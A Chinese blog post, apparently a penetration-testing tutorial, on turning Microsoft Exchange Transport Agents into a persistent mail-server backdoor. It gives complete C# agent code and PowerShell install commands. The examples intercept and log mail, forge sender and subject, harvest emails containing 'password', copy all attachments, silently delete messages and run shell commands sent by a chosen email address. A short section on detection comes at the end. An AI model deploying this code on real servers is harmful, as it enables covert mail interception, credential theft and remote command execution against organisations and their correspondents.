渗透技巧——使用 Transport Agent 作为 Exchange 后门

发布于 2024-11-09 11:10:44 字数 13998 浏览 16 评论 0

0x00 前言

ESET 研究发现了一个专门针对 Microsoft Exchange 的恶意软件 LightNeuron,使用一种从未见过的持久性技术:Transport Agent,能够实现以下功能:

  • 阅读和修改通过邮件服务器的任何电子邮件
  • 撰写并发送新电子邮件
  • 阻止任何电子邮件。原始收件人将不会收到电子邮件

参考资料:

本文仅在技术研究的角度,介绍 Transport Agent 的用法,编写代码实现不同的功能,结合利用思路给出防御建议

0x01 简介

本文将要介绍以下内容:

  • Transport Agent 基础知识
  • Transport Agent 的用法
  • 使用 Transport Agent 监控邮件
  • 使用 Transport Agent 修改邮件
  • 使用 Transport Agent 删除邮件
  • 使用 Transport Agent 启动程序
  • 防御检测

0x02 Transport Agent 基础知识

参考资料: https://docs.microsoft.com/en-us/previous-versions/office/developer/exchange-server-2010/dd877026(v=exchg.140 )

1.Transport Agent

可以用来扩展和修改 Exchange 的传输行为,以自定义消息的接受,拒绝,路由和传递,以及在各种类型的内容之间进行转换

简单理解,Transport Agents 作为 Exchange 的插件,能够对 Exchange 的传输行为进行扩展和修改,例如读取、修改和删除传输的每一份邮件

2..NET Framework Extensions for Exchange

Microsoft.Exchange.Data 命名空间提供了便于执行以下任务的类型:

  • 读写 MIME 数据
  • 将消息正文和其他文本从一种编码转换为另一种编码
  • 读取和写入 TNEF 数据
  • 读写日历和约会
  • 转换消息格式;例如,从 HTML 到 RTF
  • 响应 SMTP 事件
  • 响应路由事件

简单理解,使用 Microsoft.Exchange.Data 命名空间能够扩展和修改 Exchange 的传输行为

0x03 Transport Agent 的使用

参考资料: https://docs.microsoft.com/en-us/previous-versions/office/developer/exchange-server-2010/aa579185(v=exchg.140)?redirectedfrom=MSDN

C#开发,使用 Microsoft.Exchange.Data 命名空间

使用 VisualStudio,新建 C#项目,项目类型选择类库,引用以下 dll:

  • Microsoft.Exchange.Data.Common.dll
  • Microsoft.Exchange.Data.Transport.dll

dll 可从 Exchange 服务器上获得,位置为 %ExchangeInstallPath%Public ,例如 C:\Program Files\Microsoft\Exchange Server\V15\Public

测试代码如下:

using System;
using System.Collections.Generic;
using System.Text;
using Microsoft.Exchange.Data.Transport;
using Microsoft.Exchange.Data.Transport.Smtp;

namespace MyAgents
{
  public sealed class MyAgentFactory : SmtpReceiveAgentFactory
  {
    public override SmtpReceiveAgent CreateAgent(SmtpServer server)
    {
      return new MyAgent();
    }
  }
  public class MyAgent : SmtpReceiveAgent
  {
    public MyAgent()
    {
      this.OnEndOfData += new EndOfDataEventHandler(MyEndOfDataHandler);
    }
    private void MyEndOfDataHandler (ReceiveMessageEventSource source, EndOfDataEventArgs e)

    {
      // The following line appends text to the subject of the message that caused the event.
      e.MailItem.Message.Subject += " - this text appended by MyAgent";
    }
  }
}

编译生成 MyAgent.dll

将 MyAgent.dll 复制到 Exchange 服务器,保存路径为 C:\test\MyAgent.dll

使用 Exchange Server PowerShell 安装 Transport Agent,命令如下:

Install-TransportAgent -Name "MySpamFilterAgent" -TransportAgentFactory "MyAgents.MyAgentFactory"  -AssemblyPath "C:\test\MyAgent.dll"
Enable-TransportAgent MySpamFilterAgent
Restart-Service MSExchangeTransport

需要重启服务 MSExchangeTransport 才能够生效

卸载 Transport Agent 的命令:

Uninstall-TransportAgent MySpamFilterAgent -Confirm:$false
Restart-Service MSExchangeTransport

查看这个 Transport Agent 的命令:

Get-TransportAgent MySpamFilterAgent|fl

查看所有 Transport Agent 的命令:

Get-TransportAgent |fl

Transport Agent 安装成功后,使用任意用户发送邮件,邮件标题被修改,测试成功

0x04 使用 Transport Agent 实现不同的功能

示例 1

监控邮件,记录发件人和时间,文件保存为 c:\test\log.txt

代码如下:

using System;
using System.Collections.Generic;
using System.Text;
using System.IO;
using Microsoft.Exchange.Data.Transport;
using Microsoft.Exchange.Data.Transport.Smtp;

namespace MyAgents
{
  public sealed class MyAgentFactory : SmtpReceiveAgentFactory
  {
    public override SmtpReceiveAgent CreateAgent(SmtpServer server)
    {
      return new MyAgent();
    }
  }
  public class MyAgent : SmtpReceiveAgent
  {
    public MyAgent()
    {
      this.OnEndOfData += new EndOfDataEventHandler(MyEndOfDataHandler);
    }
    private void MyEndOfDataHandler(ReceiveMessageEventSource source, EndOfDataEventArgs e)

    {
      using (System.IO.StreamWriter file = new System.IO.StreamWriter(@"C:\test\log.txt", true))
      {
        file.WriteLine("Sender:" + e.MailItem.Message.Sender.SmtpAddress);
        file.WriteLine("Date:" + e.MailItem.Message.Date);
      }
    }
  }
}

示例 2

修改邮件的发件人和主题

代码如下:

using System;
using System.Collections.Generic;
using System.Text;
using System.IO;
using Microsoft.Exchange.Data.Transport;
using Microsoft.Exchange.Data.Transport.Smtp;

namespace MyAgents
{
  public sealed class MyAgentFactory : SmtpReceiveAgentFactory
  {
    public override SmtpReceiveAgent CreateAgent(SmtpServer server)
    {
      return new MyAgent();
    }
  }
  public class MyAgent : SmtpReceiveAgent
  {
    public MyAgent()
    {
      this.OnEndOfData += new EndOfDataEventHandler(MyEndOfDataHandler);
    }
    private void MyEndOfDataHandler(ReceiveMessageEventSource source, EndOfDataEventArgs e)

    {
      // The following line appends text to the subject of the message that caused the event.
      e.MailItem.Message.Subject += " - this text appended by MyAgent";
      e.MailItem.Message.From.DisplayName = "test2";
      e.MailItem.Message.From.SmtpAddress = "test2@test.com";
      e.MailItem.Message.Sender.DisplayName = "test2";
      e.MailItem.Message.Sender.SmtpAddress = "test2@test.com";
    }
  }
}

示例 3

监控邮件,如果邮件中包括字符串 password (不区分大小写),则将这份邮件保存至 c:\test ,文件名称为 <MessageId>.eml (为了避免文件名重复,这是使用唯一的 MessageId 作为文件名)

代码如下:

using System;
using System.Collections.Generic;
using System.Text;
using System.IO;
using Microsoft.Exchange.Data.Transport;
using Microsoft.Exchange.Data.Transport.Smtp;

namespace MyAgents
{
  public sealed class MyAgentFactory : SmtpReceiveAgentFactory
  {
    public override SmtpReceiveAgent CreateAgent(SmtpServer server)
    {
      return new MyAgent();
    }
  }
  public class MyAgent : SmtpReceiveAgent
  {
    public MyAgent()
    {
      this.OnEndOfData += new EndOfDataEventHandler(MyEndOfDataHandler);
    }
    private void MyEndOfDataHandler(ReceiveMessageEventSource source, EndOfDataEventArgs e)

    {

      long len = e.MailItem.GetMimeReadStream().Length;
      byte[] heByte = new byte[len];
      int r = e.MailItem.GetMimeReadStream().Read(heByte, 0, heByte.Length);
      string searchData = System.Text.Encoding.UTF8.GetString(heByte);
      if (searchData.IndexOf("password", 0, StringComparison.CurrentCultureIgnoreCase) != -1)
      {
        string[] sArray = e.MailItem.Message.MessageId.Split('@');
        sArray[0] = sArray[0].Substring(1);

        FileStream fs = new FileStream("c:\\test\\" + sArray[0] + ".eml", FileMode.Create);
        fs.Write(heByte, 0, heByte.Length);
        fs.Close();
      }
    }
  }
}

示例 4

监控附件,将附件名称保存在 c:\test\log.txt ,将所有附件保存至 c:\test ,文件名称为附件名称

代码如下:

using System;
using System.Collections.Generic;
using System.Text;
using System.IO;
using Microsoft.Exchange.Data.Transport;
using Microsoft.Exchange.Data.Transport.Smtp;

namespace MyAgents
{
  public sealed class MyAgentFactory : SmtpReceiveAgentFactory
  {
    public override SmtpReceiveAgent CreateAgent(SmtpServer server)
    {
      return new MyAgent();
    }
  }
  public class MyAgent : SmtpReceiveAgent
  {
    public MyAgent()
    {
      this.OnEndOfData += new EndOfDataEventHandler(MyEndOfDataHandler);
    }
    private void MyEndOfDataHandler(ReceiveMessageEventSource source, EndOfDataEventArgs e)

    {
      if (e.MailItem.Message.Attachments.Count != 0)
      {
        foreach (var attachment in e.MailItem.Message.Attachments)
        {
          using (System.IO.StreamWriter file = new System.IO.StreamWriter(@"C:\test\log.txt", true))
          {
            file.WriteLine(attachment.FileName);
          }
          FileStream fs = new FileStream("c:\\test\\" + attachment.FileName, FileMode.Create);
          attachment.GetContentReadStream().CopyTo(fs);
          fs.Close();
        }

      }
    }
  }
}

相比于示例代码 3,将数据保存至文件的功能有所区别

示例 3 采用了先从流中读取数据并保存在字节数组中,再将字节数组转换为字符串,最后通过 FileStream 将字符串写入文件,这样虽然效率变慢,但是支持对全文内容进行搜索

示例代码 4 不需要考虑全文搜索,所以可以使用 Stream.CopyTo 复制两个流来提高效率

示例 5

监控邮件,如果邮件内容包括字符串 alert (不区分大小写),那么将这份邮件丢弃

代码如下:

using System;
using System.Collections.Generic;
using System.Text;
using System.IO;
using Microsoft.Exchange.Data.Transport;
using Microsoft.Exchange.Data.Transport.Smtp;

namespace MyAgents
{
  public sealed class MyAgentFactory : SmtpReceiveAgentFactory
  {
    public override SmtpReceiveAgent CreateAgent(SmtpServer server)
    {
      return new MyAgent();
    }
  }
  public class MyAgent : SmtpReceiveAgent
  {
    public MyAgent()
    {
      this.OnEndOfData += new EndOfDataEventHandler(MyEndOfDataHandler);
    }
    private void MyEndOfDataHandler(ReceiveMessageEventSource source, EndOfDataEventArgs e)
    {
      long len = e.MailItem.GetMimeReadStream().Length;
      byte[] heByte = new byte[len];
      int r = e.MailItem.GetMimeReadStream().Read(heByte, 0, heByte.Length);
      string searchData = System.Text.Encoding.UTF8.GetString(heByte);
      if (searchData.IndexOf("alert", 0, StringComparison.CurrentCultureIgnoreCase) != -1)
      {
        foreach (EnvelopeRecipient ep in e.MailItem.Recipients)
        {
          e.MailItem.Recipients.Remove(ep);
        }
      }
    }
  }
}

示例 6

监控邮件,如果邮件来自指定用户(testa@test.com),主题为 command ,那么将执行邮件正文中的内容 xxxx(格式为 command:xxxx/command)

代码如下:

using System;
using System.Collections.Generic;
using System.Text;
using System.IO;
using Microsoft.Exchange.Data.Transport;
using Microsoft.Exchange.Data.Transport.Smtp;
using System.Diagnostics;

namespace MyAgents
{
  public sealed class MyAgentFactory : SmtpReceiveAgentFactory
  {
    public override SmtpReceiveAgent CreateAgent(SmtpServer server)
    {
      return new MyAgent();
    }
  }
  public class MyAgent : SmtpReceiveAgent
  {
    public MyAgent()
    {
      this.OnEndOfData += new EndOfDataEventHandler(MyEndOfDataHandler);
    }
    private void MyEndOfDataHandler(ReceiveMessageEventSource source, EndOfDataEventArgs e)
    {
      if (e.MailItem.Message.From.SmtpAddress == "testa@test.com")
      {
        if(e.MailItem.Message.Subject.Contains("command"))
        {
          long len = e.MailItem.Message.Body.GetContentReadStream().Length;
          byte[] heByte = new byte[len];
          int r = e.MailItem.Message.Body.GetContentReadStream().Read(heByte, 0, heByte.Length);
          string myStr = System.Text.Encoding.UTF8.GetString(heByte);
          int i = myStr.IndexOf("command:");
          int j = myStr.IndexOf("/command");
          myStr = myStr.Substring(i + 8, j - i - 8);

          Process p = new Process();
          p.StartInfo.FileName = "cmd.exe";
          p.StartInfo.Arguments = "/c" + myStr;
          p.StartInfo.UseShellExecute = false;
          p.StartInfo.RedirectStandardInput = true;
          p.StartInfo.RedirectStandardOutput = true;
          p.StartInfo.RedirectStandardError = true;
          p.StartInfo.CreateNoWindow = true;
          p.Start();

        }
      }


    }
  }
}

启动的进程权限为 NETWORK SERVICE

补充

为了便于调试,捕获错误并将错误代码输出至文件 c:\test\log.txt

代码如下:

using System;
using System.Collections.Generic;
using System.Text;
using System.IO;
using Microsoft.Exchange.Data.Transport;
using Microsoft.Exchange.Data.Transport.Smtp;
using System.Diagnostics;

namespace MyAgents
{
  public sealed class MyAgentFactory : SmtpReceiveAgentFactory
  {
    public override SmtpReceiveAgent CreateAgent(SmtpServer server)
    {
      return new MyAgent();
    }
  }
  public class MyAgent : SmtpReceiveAgent
  {
    public MyAgent()
    {
      this.OnEndOfData += new EndOfDataEventHandler(MyEndOfDataHandler);
    }
    private void MyEndOfDataHandler(ReceiveMessageEventSource source, EndOfDataEventArgs e)
    {
      try
      {

      }
      catch (Exception ex)
      {
        using (System.IO.StreamWriter file = new System.IO.StreamWriter(@"C:\test\log.txt", true))
        {
          file.WriteLine(ex.Message);
        }

      }


    }
  }
}

0x05 防御检测

1.查看 Transport Agent 配置

使用 Exchange Server PowerShell,命令如下:

Get-TransportAgent

其他 Powershell 命令可参考: https://docs.microsoft.com/en-us/powershell/module/exchange/?view=exchange-ps

2.查看服务日志

安装 Transport Agent 需要重启服务 MSExchangeTransport

3.查看进程

使用 Transport Agent 后,进程 w3wp.exe 将会加载对应的 dll

可以查看进程 w3wp.exe 是否加载可疑 dll

0x06 小结

本文介绍了 Transport Agent 的用法,编写代码实现对邮件的记录、修改和删除,实现了作为后门使用的常用功能,结合利用思路给出防御建议。

如果你对这篇内容有疑问,欢迎到本站社区发帖提问 参与讨论,获取更多帮助,或者扫码二维码加入 Web 技术交流群。

扫码二维码加入Web技术交流群

发布评论

需要 登录 才能够评论, 你可以免费 注册 一个本站的账号。
列表为空,暂无数据

关于作者

雨后咖啡店

暂无简介

文章
评论
25 人气
更多

推荐作者

github_3h15MP3i7

文章 0 评论 0

静赏你的温柔

文章 0 评论 0

你的呼吸

文章 0 评论 0

微信用户

文章 0 评论 0

心房敞

文章 0 评论 0

醉态萌生

文章 0 评论 0

    我们使用 Cookies 和其他技术来定制您的体验包括您的登录状态等。通过阅读我们的 隐私政策 了解更多相关信息。 单击 接受 或继续使用网站,即表示您同意使用 Cookies 和您的相关数据。
    原文